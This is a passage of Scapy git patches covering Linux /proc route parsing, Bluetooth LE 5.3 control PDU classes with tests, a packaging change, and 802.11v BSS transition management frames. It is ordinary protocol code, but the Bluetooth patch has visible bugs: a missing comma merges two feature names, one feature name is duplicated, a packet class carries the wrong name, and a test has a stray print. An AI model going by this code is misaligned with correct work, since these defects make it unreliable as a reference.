scope, iface) - ret.append((addr, int(scope, 16), ifname)) - return ret + return [] def read_routes6(): # type: () -> List[Tuple[str, int, str, str, List[str], int]] - try: - with open("/proc/net/ipv6_route", "r") as f: - entries = [line.split() for line in f] - except IOError: - return [] + """ + Read routes from /proc/net/ipv6_route + """ + # 1. destination network # 2. destination prefix length # 3. source network displayed @@ -339,7 +361,6 @@ def read_routes6(): # 8. use counter (?!?) # 9. flags # 10. device name - routes = [] def proc2r(p): # type: (str) -> str @@ -347,33 +368,37 @@ def proc2r(p): addr = b':'.join(ret).decode() return scapy.utils6.in6_ptop(addr) - lifaddr = in6_getifaddr() - for d, dp, _, _, nh, metric, _, _, fl, dev in entries: - metric_int = int(metric, 16) - fl_int = int(fl, 16) - - if fl_int & RTF_UP == 0: - continue - if fl_int & RTF_REJECT: - continue - - d = proc2r(d) - dp_int = int(dp, 16) - nh = proc2r(nh) - - cset = [] # candidate set (possible source addresses) - if dev == conf.loopback_name: - if d == '::': - continue - cset = ['::1'] - else: - devaddrs = (x for x in lifaddr if x[2] == dev) - cset = scapy.utils6.construct_source_candidate_set(d, dp_int, devaddrs) - - if len(cset) != 0: - routes.append((d, dp_int, nh, dev, cset, metric_int)) + try: + with open("/proc/net/ipv6_route", "r") as f: + routes = [] + lifaddr = in6_getifaddr() + for line in (x.split() for x in itertools.islice(f, 1, None)): + # line = d, dp, _, _, nh, metric, _, _, fl, dev + d, nh, dev = line[0], line[4], line[9] + dp, metric, flags = [int(x, 16) for x in [line[1], line[5], line[8]]] + + if flags & RTF_UP == 0: + continue + if flags & RTF_REJECT: + continue + + d = proc2r(d) + nh = proc2r(nh) + + cset = [] # candidate set (possible source addresses) + if dev == conf.loopback_name: + if d == '::': + continue + cset = ['::1'] + else: + devaddrs = (x for x in lifaddr if x[2] == dev) + cset = scapy.utils6.construct_source_candidate_set(d, dp, devaddrs) - return routes + if len(cset) != 0: + routes.append((d, dp, nh, dev, cset, metric)) + return routes + except IOError: + return [] def get_if_index(iff): From 2fd25240fec92ea3b023aaecf2c048a013367b16 Mon Sep 17 00:00:00 2001 From: "Matthias St. Pierre" Date: Mon, 30 Jan 2023 18:29:23 +0100 Subject: [PATCH 0958/1632] Apply suggestions from code review Co-authored-by: Pierre --- scapy/arch/linux.py | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index ca502961467..91eac378966 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -132,7 +132,7 @@ def _get_if_list(): Function to read the interfaces from /proc/net/dev """ try: - with open("/proc/net/dev", "r") as f: + with open("/proc/net/dev", "r", errors='replace') as f: return [line.split(':', 1)[0].strip() for line in itertools.islice(f, 2, None)] except IOError: @@ -234,10 +234,10 @@ def read_routes(): Read routes from /proc/net/route """ try: - with open("/proc/net/route", "r", errors='replace') as f: + with open("/proc/net/route", "r", errors="replace") as f, \ + socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s: routes = [] # Loopback route - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) @@ -307,7 +307,6 @@ def read_routes(): route = tmp_route routes.append(route) - s.close() return routes except IOError: @@ -330,7 +329,7 @@ def in6_getifaddr(): the system. """ try: - with open("/proc/net/if_inet6", "r") as f: + with open("/proc/net/if_inet6", "r", errors='replace') as f: ret = [] # type: List[Tuple[str, int, str]] for addr, _, _, scope, _, ifname in (x.split() for x in f): addr = scapy.utils6.in6_ptop( @@ -369,7 +368,7 @@ def proc2r(p): return scapy.utils6.in6_ptop(addr) try: - with open("/proc/net/ipv6_route", "r") as f: + with open("/proc/net/ipv6_route", "r", errors='replace') as f: routes = [] lifaddr = in6_getifaddr() for line in (x.split() for x in itertools.islice(f, 1, None)): From 53c6d736c6cb1081bd7413dc2c0b51eb7498e1da Mon Sep 17 00:00:00 2001 From: Rubin Gerritsen Date: Tue, 27 Dec 2022 18:41:34 +0100 Subject: [PATCH 0959/1632] btle: Extend control PDU list with Bluetooth 5.3 PDUs Adds the Control PDUs that were added in spec revision 5.1, 5.2 and 5.3. This changes only support using a scapy as a packet builder. Dissection is not yet implemented. BTLEFeatureField() is extended with 5.1, 5.2, 5.3 features --- scapy/layers/bluetooth4LE.py | 234 ++++++++++++++++++++++++++++- test/scapy/layers/bluetooth4LE.uts | 213 +++++++++++++++++++++++++- 2 files changed, 442 insertions(+), 5 deletions(-) diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index 6d351c03607..cd1abb429c8 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -164,7 +164,31 @@ def __init__(self, name, default): 'le_ext_adv', 'le_periodic_adv', 'ch_sel_alg', - 'le_pwr_class'] + 'le_pwr_class' + 'min_used_channels', + 'conn_cte_req', + 'conn_cte_rsp', + 'connless_cte_tx', + 'connless_cte_rx', + 'antenna_switching_cte_aod_tx', + 'antenna_switching_cte_aoa_rx', + 'cte_rx', + 'periodic_adv_sync_transfer_tx', + 'periodic_adv_sync_transfer_rx', + 'sleep_clock_accuracy_updates', + 'remote_public_key_validation', + 'cis_central', + 'cis_peripheral', + 'iso_broadcaster', + 'synchronized_receiver', + 'connected_iso_host_support', + 'le_power_control_request', + 'le_power_control_request', + 'le_path_loss_monitoring', + 'periodic_adv_adi_support', + 'connection_subrating', + 'connection_subrating_host_support', + 'channel_classification'] ) @@ -395,6 +419,23 @@ class BTLE_CONNECT_REQ(Packet): 0x16: 'LL_PHY_REQ', 0x17: 'LL_PHY_RSP', 0x18: 'LL_PHY_UPDATE_IND', + 0x19: 'LL_MIN_USED_CHANNELS', + 0x1A: 'LL_CTE_REQ', + 0x1B: 'LL_CTE_RSP', + 0x1C: 'LL_PERIODIC_SYNC_IND', + 0x1D: 'LL_CLOCK_ACCURACY_REQ', + 0x1E: 'LL_CLOCK_ACCURACY_RSP', + 0x1F: 'LL_CIS_REQ', + 0x20: 'LL_CIS_RSP', + 0x21: 'LL_CIS_IND', + 0x22: 'LL_CIS_TERMINATE_IND', + 0x23: 'LL_POWER_CONTROL_REQ', + 0x24: 'LL_POWER_CONTROL_RSP', + 0x25: 'LL_POWER_CHANGE_IND', + 0x26: 'LL_SUBRATE_REQ', + 0x27: 'LL_SUBRATE_IND', + 0x28: 'LL_CHANNEL_REPORTING_IND', + 0x29: 'LL_CHANNEL_STATUS_IND', } @@ -620,6 +661,181 @@ class LL_MIN_USED_CHANNELS_IND(Packet): ] +class LL_CTE_REQ(Packet): + name = "LL_CTE_REQ" + fields_desc = [ + LEBitField('min_cte_len_req', 0, 5), + LEBitField('rfu', 0, 1), + LEBitField("cte_type_req", 0, 2) + ] + + +class LL_CTE_RSP(Packet): + name = "LL_CTE_RSP" + fields_desc = [] + + +class LL_PERIODIC_SYNC_IND(Packet): + name = "LL_PERIODIC_SYNC_IND" + fields_desc = [ + XLEShortField("id", 251), + LEBitField("sync_info", 0, 18 * 8), + XLEShortField("conn_event_count", 0), + XLEShortField("last_pa_event_counter", 0), + LEBitField('sid', 0, 4), + LEBitField('a_type', 0, 1), + LEBitField('sca', 0, 3), + BTLEPhysField('phy', 0), + BDAddrField("AdvA", None), + XLEShortField("sync_conn_event_count", 0), + ] + + +class LL_CLOCK_ACCURACY_REQ(Packet): + name = "LL_CLOCK_ACCURACY_REQ" + fields_desc = [ + XByteField("sca", 0), + ] + + +class LL_CLOCK_ACCURACY_RSP(Packet): + name = "LL_CLOCK_ACCURACY_RSP" + fields_desc = [ + XByteField("sca", 0), + ] + + +class LL_CIS_REQ(Packet): + name = 'LL_CIS_REQ' + fields_desc = [ + XByteField("cig_id", 0), + XByteField("cis_id", 0), + BTLEPhysField('phy_c_to_p', 0), + BTLEPhysField('phy_p_to_c', 0), + LEBitField('max_sdu_c_to_p', 0, 12), + LEBitField('rfu1', 0, 3), + LEBitField('framed', 0, 1), + LEBitField('max_sdu_p_to_c', 0, 12), + LEBitField('rfu2', 0, 4), + LEBitField('sdu_interval_c_to_p', 0, 20), + LEBitField('rfu3', 0, 4), + LEBitField('sdu_interval_p_to_c', 0, 20), + LEBitField('rfu4', 0, 4), + XLEShortField("max_pdu_c_to_p", 0), + XLEShortField("max_pdu_p_to_c", 0), + XByteField("nse", 0), + X3BytesField("subinterval", 0x0), + LEBitField('bn_c_to_p', 0, 4), + LEBitField('bn_p_to_c', 0, 4), + ByteField("ft_c_to_p", 0), + ByteField("ft_p_to_c", 0), + XLEShortField("iso_interval", 0), + X3BytesField("cis_offset_min", 0x0), + X3BytesField("cis_offset_max", 0x0), + XLEShortField("conn_event_count", 0), + ] + + +class LL_CIS_RSP(Packet): + name = 'LL_CIS_RSP' + fields_desc = [ + X3BytesField("cis_offset_min", 0x0), + X3BytesField("cis_offset_max", 0x0), + XLEShortField("conn_event_count", 0), + ] + + +class LL_CIS_IND(Packet): + name = 'LL_CIS_IND' + fields_desc = [ + XIntField("AA", 0x00), + X3BytesField("cis_offset", 0x0), + X3BytesField("cig_sync_delay", 0x0), + X3BytesField("cis_sync_delay", 0x0), + XLEShortField("conn_event_count", 0), + ] + + +class LL_CIS_TERMINATE_IND(Packet): + name = 'LL_CIS_TERMINATE_IND' + fields_desc = [ + ByteField("cig_id", 0x0), + ByteField("cis_id", 0x0), + ByteField("error_code", 0x0), + ] + + +class LL_POWER_CONTROL_REQ(Packet): + name = 'LL_POWER_CONTROL_REQ' + fields_desc = [ + ByteField("phy", 0x0), + SignedByteField("delta", 0x0), + SignedByteField("tx_power", 0x0), + ] + + +class LL_POWER_CONTROL_RSP(Packet): + name = 'LL_POWER_CONTROL_RSP' + fields_desc = [ + LEBitField("min", 0, 1), + LEBitField("max", 0, 1), + LEBitField("rfu", 0, 6), + SignedByteField("delta", 0), + SignedByteField("tx_power", 0x0), + ByteField("apr", 0x0), + ] + + +class LL_POWER_CHANGE_IND(Packet): + name = 'LL_POWER_CHANGE_IND' + fields_desc = [ + ByteField("phy", 0x0), + LEBitField("min", 0, 1), + LEBitField("max", 0, 1), + LEBitField("rfu", 0, 6), + SignedByteField("delta", 0), + ByteField("tx_power", 0x0), + ] + + +class LL_SUBRATE_REQ(Packet): + name = 'LL_SUBRATE_REQ' + fields_desc = [ + LEShortField("subrate_factor_min", 0x0), + LEShortField("subrate_factor_max", 0x0), + LEShortField("max_latency", 0x0), + LEShortField("continuation_number", 0x0), + LEShortField("timeout", 0x0), + ] + + +class LL_SUBRATE_IND(Packet): + name = 'LL_SUBRATE_IND' + fields_desc = [ + LEShortField("subrate_factor", 0x0), + LEShortField("subrate_base_event", 0x0), + LEShortField("latency", 0x0), + LEShortField("continuation_number", 0x0), + LEShortField("timeout", 0x0), + ] + + +class LL_CHANNEL_REPORTING_IND(Packet): + name = 'LL_SUBRATE_IND' + fields_desc = [ + ByteField("enable", 0x0), + ByteField("min_spacing", 0x0), + ByteField("max_delay", 0x0), + ] + + +class LL_CHANNEL_STATUS_IND(Packet): + name = 'LL_CHANNEL_STATUS_IND' + fields_desc = [ + LEBitField("channel_classification", 0, 10 * 8), + ] + + # Advertisement (37-39) channel PDUs bind_layers(BTLE, BTLE_ADV, access_addr=0x8E89BED6) bind_layers(BTLE, BTLE_DATA) @@ -662,6 +878,22 @@ class LL_MIN_USED_CHANNELS_IND(Packet): bind_layers(BTLE_CTRL, LL_PHY_RSP, opcode=0x17) bind_layers(BTLE_CTRL, LL_PHY_UPDATE_IND, opcode=0x18) bind_layers(BTLE_CTRL, LL_MIN_USED_CHANNELS_IND, opcode=0x19) +bind_layers(BTLE_CTRL, LL_CTE_REQ, opcode=0x1A) +bind_layers(BTLE_CTRL, LL_CTE_RSP, opcode=0x1B) +bind_layers(BTLE_CTRL, LL_PERIODIC_SYNC_IND, opcode=0x1C) +bind_layers(BTLE_CTRL, LL_CLOCK_ACCURACY_REQ, opcode=0x1D) +bind_layers(BTLE_CTRL, LL_CLOCK_ACCURACY_RSP, opcode=0x1E) +bind_layers(BTLE_CTRL, LL_CIS_REQ, opcode=0x1F) +bind_layers(BTLE_CTRL, LL_CIS_RSP, opcode=0x20) +bind_layers(BTLE_CTRL, LL_CIS_IND, opcode=0x21) +bind_layers(BTLE_CTRL, LL_CIS_TERMINATE_IND, opcode=0x22) +bind_layers(BTLE_CTRL, LL_POWER_CONTROL_REQ, opcode=0x23) +bind_layers(BTLE_CTRL, LL_POWER_CONTROL_RSP, opcode=0x24) +bind_layers(BTLE_CTRL, LL_POWER_CHANGE_IND, opcode=0x25) +bind_layers(BTLE_CTRL, LL_SUBRATE_REQ, opcode=0x26) +bind_layers(BTLE_CTRL, LL_SUBRATE_IND, opcode=0x27) +bind_layers(BTLE_CTRL, LL_CHANNEL_REPORTING_IND, opcode=0x28) +bind_layers(BTLE_CTRL, LL_CHANNEL_STATUS_IND, opcode=0x29) conf.l2types.register(DLT_BLUETOOTH_LE_LL, BTLE) diff --git a/test/scapy/layers/bluetooth4LE.uts b/test/scapy/layers/bluetooth4LE.uts index 33a0ee694b8..b671a0c347f 100644 --- a/test/scapy/layers/bluetooth4LE.uts +++ b/test/scapy/layers/bluetooth4LE.uts @@ -103,17 +103,18 @@ assert test[LL_UNKNOWN_RSP].code == 4 = LL_FEATURE_REQ -test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_REQ(feature_set=0x1234) +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_REQ(feature_set=0x011234) test = BTLE(raw(test)) assert test[LL_FEATURE_REQ].feature_set == \ - "ext_reject_ind+le_ping+le_data_len_ext+tx_mod_idx+le_ext_adv" + "ext_reject_ind+le_ping+le_data_len_ext+tx_mod_idx+le_ext_adv+conn_cte_req" = LL_FEATURE_RSP -test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_RSP(feature_set=0x4321) +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / LL_FEATURE_RSP(feature_set=0x104321) test = BTLE(raw(test)) +print(test[LL_FEATURE_RSP].feature_set) assert test[LL_FEATURE_RSP].feature_set == \ - "le_encryption+le_data_len_ext+le_2m_phy+tx_mod_idx+ch_sel_alg" + "le_encryption+le_data_len_ext+le_2m_phy+tx_mod_idx+ch_sel_alg+antenna_switching_cte_aod_tx" = LL_PAUSE_ENC_REQ @@ -262,6 +263,210 @@ test = BTLE(raw(test)) assert test[LL_MIN_USED_CHANNELS_IND].phys == "phy_1m+phy_2m" assert test[LL_MIN_USED_CHANNELS_IND].min_used_channels == 3 +# LL_CTE_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CTE_REQ(min_cte_len_req=20, rfu=1, cte_type_req=2) +test = BTLE(raw(test)) +assert test[LL_CTE_REQ].min_cte_len_req == 20 +assert test[LL_CTE_REQ].rfu == 1 +assert test[LL_CTE_REQ].cte_type_req == 2 + + +# LL_CTE_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CTE_RSP() +test = BTLE(raw(test)) + + +# LL_PERIODIC_SYNC_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_PERIODIC_SYNC_IND(id=2, + sync_info=12345, + conn_event_count=0x4321, + last_pa_event_counter=0xabcd, sid=0xF, + a_type=1, sca=3, phy=2, AdvA="cc:bb:bb:bb:bb:bb", + sync_conn_event_count=32) +test = BTLE(raw(test)) +assert test[LL_PERIODIC_SYNC_IND].id == 2 +assert test[LL_PERIODIC_SYNC_IND].sync_info == 12345 +assert test[LL_PERIODIC_SYNC_IND].conn_event_count == 0x4321 +assert test[LL_PERIODIC_SYNC_IND].last_pa_event_counter == 0xabcd +assert test[LL_PERIODIC_SYNC_IND].sid == 0xF +assert test[LL_PERIODIC_SYNC_IND].a_type == 1 +assert test[LL_PERIODIC_SYNC_IND].sca == 3 +assert test[LL_PERIODIC_SYNC_IND].phy == 2 +assert test[LL_PERIODIC_SYNC_IND].AdvA == "cc:bb:bb:bb:bb:bb" +assert test[LL_PERIODIC_SYNC_IND].sync_conn_event_count == 32 + + +# LL_CLOCK_ACCURACY_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CLOCK_ACCURACY_REQ(sca=2) +test = BTLE(raw(test)) +assert test[LL_CLOCK_ACCURACY_REQ].sca == 2 + + +# LL_CLOCK_ACCURACY_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CLOCK_ACCURACY_RSP(sca=3) +test = BTLE(raw(test)) +assert test[LL_CLOCK_ACCURACY_RSP].sca == 3 + + +# LL_CIS_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CIS_REQ(cig_id=3, cis_id=2, phy_c_to_p=1, phy_p_to_c=2, + max_sdu_c_to_p=123, max_sdu_p_to_c=321, + sdu_interval_c_to_p=234, framed=1, sdu_interval_p_to_c=432, + max_pdu_c_to_p=123, max_pdu_p_to_c=234, + nse=10, subinterval=4567, + bn_c_to_p=3, bn_p_to_c=2, + ft_c_to_p=15, ft_p_to_c=16, + iso_interval=12345, + cis_offset_min=1, cis_offset_max=999, + conn_event_count=2) +test = BTLE(raw(test)) +assert test[LL_CIS_REQ].cig_id == 3 +assert test[LL_CIS_REQ].cis_id == 2 +assert test[LL_CIS_REQ].phy_c_to_p == 1 +assert test[LL_CIS_REQ].phy_p_to_c == 2 +assert test[LL_CIS_REQ].max_sdu_c_to_p == 123 +assert test[LL_CIS_REQ].framed == 1 +assert test[LL_CIS_REQ].max_sdu_p_to_c == 321 +assert test[LL_CIS_REQ].sdu_interval_c_to_p == 234 +assert test[LL_CIS_REQ].sdu_interval_p_to_c == 432 +assert test[LL_CIS_REQ].max_pdu_c_to_p == 123 +assert test[LL_CIS_REQ].max_pdu_p_to_c == 234 +assert test[LL_CIS_REQ].nse == 10 +assert test[LL_CIS_REQ].subinterval == 4567 +assert test[LL_CIS_REQ].bn_c_to_p == 3 +assert test[LL_CIS_REQ].bn_p_to_c == 2 +assert test[LL_CIS_REQ].ft_c_to_p == 15 +assert test[LL_CIS_REQ].ft_p_to_c == 16 +assert test[LL_CIS_REQ].iso_interval == 12345 +assert test[LL_CIS_REQ].cis_offset_min == 1 +assert test[LL_CIS_REQ].cis_offset_max == 999 +assert test[LL_CIS_REQ].conn_event_count == 2 + + +# LL_CIS_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CIS_RSP(cis_offset_min=1, cis_offset_max=999, conn_event_count=400) +test = BTLE(raw(test)) +assert test[LL_CIS_RSP].cis_offset_min == 1 +assert test[LL_CIS_RSP].cis_offset_max == 999 +assert test[LL_CIS_RSP].conn_event_count == 400 + + +# LL_CIS_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CIS_IND(AA=0x12345678, cis_offset=1, + cig_sync_delay=999, cis_sync_delay=400, conn_event_count=300) +test = BTLE(raw(test)) +assert test[LL_CIS_IND].AA == 0x12345678 +assert test[LL_CIS_IND].cis_offset == 1 +assert test[LL_CIS_IND].cig_sync_delay == 999 +assert test[LL_CIS_IND].cis_sync_delay == 400 +assert test[LL_CIS_IND].conn_event_count == 300 + + +# LL_CIS_TERMINATE_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CIS_TERMINATE_IND(cig_id=33, cis_id=44, error_code=55) +test = BTLE(raw(test)) +assert test[LL_CIS_TERMINATE_IND].cig_id == 33 +assert test[LL_CIS_TERMINATE_IND].cis_id == 44 +assert test[LL_CIS_TERMINATE_IND].error_code == 55 + + +# LL_POWER_CONTROL_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_POWER_CONTROL_REQ(phy=3, delta=-34, tx_power=55) +test = BTLE(raw(test)) +assert test[LL_POWER_CONTROL_REQ].phy == 3 +assert test[LL_POWER_CONTROL_REQ].delta == -34 +assert test[LL_POWER_CONTROL_REQ].tx_power == 55 + + +# LL_POWER_CONTROL_RSP + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_POWER_CONTROL_RSP(min=0, max=1, delta=-34, tx_power=55, apr=4) +test = BTLE(raw(test)) +assert test[LL_POWER_CONTROL_RSP].min == 0 +assert test[LL_POWER_CONTROL_RSP].max == 1 +assert test[LL_POWER_CONTROL_RSP].delta == -34 +assert test[LL_POWER_CONTROL_RSP].tx_power == 55 +assert test[LL_POWER_CONTROL_RSP].apr == 4 + + +# LL_POWER_CHANGE_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_POWER_CHANGE_IND(phy=3, min=0, max=1, delta=-34, tx_power=55) +test = BTLE(raw(test)) +assert test[LL_POWER_CHANGE_IND].phy == 3 +assert test[LL_POWER_CHANGE_IND].min == 0 +assert test[LL_POWER_CHANGE_IND].max == 1 +assert test[LL_POWER_CHANGE_IND].delta == -34 +assert test[LL_POWER_CHANGE_IND].tx_power == 55 + + + +# LL_SUBRATE_REQ + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_SUBRATE_REQ(subrate_factor_min=3, subrate_factor_max=0, + max_latency=1, continuation_number=123, timeout=55) +test = BTLE(raw(test)) +assert test[LL_SUBRATE_REQ].subrate_factor_min == 3 +assert test[LL_SUBRATE_REQ].subrate_factor_max == 0 +assert test[LL_SUBRATE_REQ].max_latency == 1 +assert test[LL_SUBRATE_REQ].continuation_number == 123 +assert test[LL_SUBRATE_REQ].timeout == 55 + + +# LL_SUBRATE_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_SUBRATE_IND(subrate_factor=3, subrate_base_event=0, + latency=1, continuation_number=123, timeout=55) +test = BTLE(raw(test)) +assert test[LL_SUBRATE_IND].subrate_factor == 3 +assert test[LL_SUBRATE_IND].subrate_base_event == 0 +assert test[LL_SUBRATE_IND].latency == 1 +assert test[LL_SUBRATE_IND].continuation_number == 123 +assert test[LL_SUBRATE_IND].timeout == 55 + + +# LL_CHANNEL_REPORTING_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CHANNEL_REPORTING_IND(enable=1, min_spacing=123, max_delay=124) +test = BTLE(raw(test)) +assert test[LL_CHANNEL_REPORTING_IND].enable == 1 +assert test[LL_CHANNEL_REPORTING_IND].min_spacing == 123 +assert test[LL_CHANNEL_REPORTING_IND].max_delay == 124 + + +# LL_CHANNEL_STATUS_IND + +test = BTLE(access_addr=1) / BTLE_DATA() / BTLE_CTRL() / \ + LL_CHANNEL_STATUS_IND(channel_classification=123456789012345) +test = BTLE(raw(test)) +assert test[LL_CHANNEL_STATUS_IND].channel_classification == 123456789012345 + + = BTLE_DATA + BTLE_EMPTY_PDU test = BTLE(access_addr=1)/BTLE_DATA(LLID=1, len=0)/BTLE_EMPTY_PDU() From 6ae0e87fba24e9e61eaf687d5374a5dbd330088d Mon Sep 17 00:00:00 2001 From: wim glenn Date: Tue, 31 Jan 2023 15:01:14 -0600 Subject: [PATCH 0960/1632] =?UTF-8?q?Don=E2=80=99t=20distribute=20test=20d?= =?UTF-8?q?irectory=20into=20site-packages=20(#3838)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Don’t distribute test directory into site-packages * exclude test/* from sdist --- MANIFEST.in | 1 + setup.py | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/MANIFEST.in b/MANIFEST.in index cdf9a3018f0..27558eecff6 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -2,3 +2,4 @@ include MANIFEST.in include LICENSE include run_scapy include scapy/VERSION +recursive-exclude test * diff --git a/setup.py b/setup.py index 7aef20a463f..7b60df5bd9c 100755 --- a/setup.py +++ b/setup.py @@ -33,7 +33,7 @@ def process_ignore_tags(buffer): setup( name='scapy', version=__import__('scapy').VERSION, - packages=find_packages(), + packages=find_packages(exclude=["test"]), data_files=[('share/man/man1', ["doc/scapy.1"])], package_data={ 'scapy': ['VERSION'], From 61756e0c1a5def9e3dbc4f9b57e987c45e4d14c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alp=20Atakan=20=C4=B0=C5=9Fbakan?= Date: Wed, 1 Feb 2023 00:06:44 +0300 Subject: [PATCH 0961/1632] Add 802.11v BSS transition management request & response (#3827) * Add 802.11 action category fields - 802.11-2016 9.4.1.11 * Add 802.11 WNM action fields - 802.11-2016 9.6.14.1 * Add 802.11v BTM request & response frames - 802.11-2016 9.6.14.9 - 802.11-2016 9.6.14.10 - BSS transition management (BTM) request & response frames usually contain neighbor report subelem, which is added. - Neighbor report can have additional subelems, for those generic SubelemTLV is used. * Add 802.11v BTM request & response tests - 802.11-2016 9.6.14.9 - 802.11-2016 9.6.14.10 * Add Dot11Ack test --- scapy/layers/dot11.py | 218 ++++++++++++++++++++++++++++++++++++ test/scapy/layers/dot11.uts | 59 ++++++++++ 2 files changed, 277 insertions(+) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index eb8b30d5ef3..dcc85e4ef6f 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -1512,6 +1512,218 @@ class Dot11Ack(Packet): name = "802.11 Ack packet" +# 802.11-2016 9.4.1.11 + +class Dot11Action(Packet): + name = "802.11 Action" + fields_desc = [ + ByteEnumField("category", 0x00, { + 0x00: "Spectrum Management", + 0x01: "QoS", + 0x02: "DLS", + 0x03: "Block", + 0x04: "Public", + 0x05: "Radio Measurement", + 0x06: "Fast BSS Transition", + 0x07: "HT", + 0x08: "SA Query", + 0x09: "Protected Dual of Public Action", + 0x0A: "WNM", + 0x0B: "Unprotected WNM", + 0x0C: "TDLS", + 0x0D: "Mesh", + 0x0E: "Multihop", + 0x0F: "Self-protected", + 0x10: "DMG", + 0x11: "Reserved Wi-Fi Alliance", + 0x12: "Fast Session Transfer", + 0x13: "Robust AV Streaming", + 0x14: "Unprotected DMG", + 0x15: "VHT" + }) + ] + + +# 802.11-2016 9.6.14.1 + +class Dot11WNM(Packet): + name = "802.11 WNM Action" + fields_desc = [ + ByteEnumField("action", 0x00, { + 0x00: "Event Request", + 0x01: "Event Report", + 0x02: "Diagnostic Request", + 0x03: "Diagnostic Report", + 0x04: "Location Configuration Request", + 0x05: "Location Configuration Response", + 0x06: "BSS Transition Management Query", + 0x07: "BSS Transition Management Request", + 0x08: "BSS Transition Management Response", + 0x09: "FMS Request", + 0x0A: "FMS Response", + 0x0B: "Collocated Interference Request", + 0x0C: "Collocated Interference Report", + 0x0D: "TFS Request", + 0x0E: "TFS Response", + 0x0F: "TFS Notify", + 0x10: "WNM Sleep Mode Request", + 0x11: "WNM Sleep Mode Response", + 0x12: "TIM Broadcast Request", + 0x13: "TIM Broadcast Response", + 0x14: "QoS Traffic Capability Update", + 0x15: "Channel Usage Request", + 0x16: "Channel Usage Response", + 0x17: "DMS Request", + 0x18: "DMS Response", + 0x19: "Timing Measurement Request", + 0x1A: "WNM Notification Request", + 0x1B: "WNM Notification Response", + 0x1C: "WNM-Notify Response" + }) + ] + + +# 802.11-2016 9.4.2.37 + +class SubelemTLV(Packet): + fields_desc = [ + ByteField("type", 0), + LEFieldLenField("len", None, fmt="B", length_of="value"), + FieldListField( + "value", + [], + ByteField('', 0), + length_from=lambda p: p.len + ) + ] + + +class BSSTerminationDuration(Packet): + name = "BSS Termination Duration" + fields_desc = [ + ByteField("id", 4), + ByteField("len", 10), + LELongField("TSF", 0), + LEShortField("duration", 0) + ] + + def extract_padding(self, s): + return "", s + + +class NeighborReport(Packet): + name = "Neighbor Report" + fields_desc = [ + ByteField("type", 0), + ByteField("len", 13), + MACField("BSSID", ETHER_ANY), + # BSSID Information + BitField("AP_reach", 0, 2, tot_size=-4), + BitField("security", 0, 1), + BitField("key_scope", 0, 1), + BitField("capabilities", 0, 6), + BitField("mobility", 0, 1), + BitField("HT", 0, 1), + BitField("VHT", 0, 1), + BitField("FTM", 0, 1), + BitField("reserved", 0, 18, end_tot_size=-4), + # BSSID Information end + ByteField("op_class", 0), + ByteField("channel", 0), + ByteField("phy_type", 0), + ConditionalField( + PacketListField( + "subelems", + SubelemTLV(), + SubelemTLV, + length_from=lambda p: p.len - 13 + ), + lambda p: p.len > 13 + ) + ] + + +# 802.11-2016 9.6.14.9 + +btm_request_mode = [ + "Preferred_Candidate_List_Included", + "Abridged", + "Disassociation_Imminent", + "BSS_Termination_Included", + "ESS_Disassociation_Imminent" +] + + +class Dot11BSSTMRequest(Packet): + name = "BSS Transition Management Request" + fields_desc = [ + ByteField("token", 0), + FlagsField("mode", 0, 8, btm_request_mode), + LEShortField("disassociation_timer", 0), + ByteField("validity_interval", 0), + ConditionalField( + PacketField( + "termination_duration", + BSSTerminationDuration(), + BSSTerminationDuration + ), + lambda p: p.mode and p.mode.BSS_Termination_Included + ), + ConditionalField( + ByteField("url_len", 0), + lambda p: p.mode and p.mode.ESS_Disassociation_Imminent + ), + ConditionalField( + StrLenField("url", "", length_from=lambda p: p.url_len), + lambda p: p.mode and p.mode.ESS_Disassociation_Imminent != 0 + ), + ConditionalField( + PacketListField( + "neighbor_report", + NeighborReport(), + NeighborReport + ), + lambda p: p.mode and p.mode.Preferred_Candidate_List_Included + ) + ] + + +# 802.11-2016 9.6.14.10 + +btm_status_code = [ + "Accept", + "Reject-Unspecified_reject_reason", + "Reject-Insufficient_Beacon_or_Probe_Response_frames", + "Reject-Insufficient_available_capacity_from_all_candidates", + 